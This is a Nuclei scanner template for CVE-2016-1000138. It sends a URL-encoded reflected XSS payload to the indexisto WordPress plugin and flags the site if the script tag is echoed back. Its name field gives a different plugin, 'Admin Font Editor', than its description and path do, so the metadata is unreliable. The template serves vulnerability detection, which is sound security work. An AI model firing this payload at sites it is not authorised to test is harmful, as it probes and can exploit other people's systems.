nuclei-templates/cves/2016/CVE-2016-1000138.yaml

36 lines
964 B
YAML
Raw Normal View History

2021-07-20 23:14:21 +00:00
id: CVE-2016-1000138
info:
name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: http://www.vapidlabs.com/wp/wp_advisory.php?v=38
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000138
cwe-id: CWE-79
description: "Reflected XSS in wordpress plugin indexisto v1.0.5"
2021-07-20 23:14:21 +00:00
requests:
- method: GET
path:
2021-07-26 08:58:04 +00:00
- "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-20 23:14:21 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-26 08:58:04 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-20 23:14:21 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200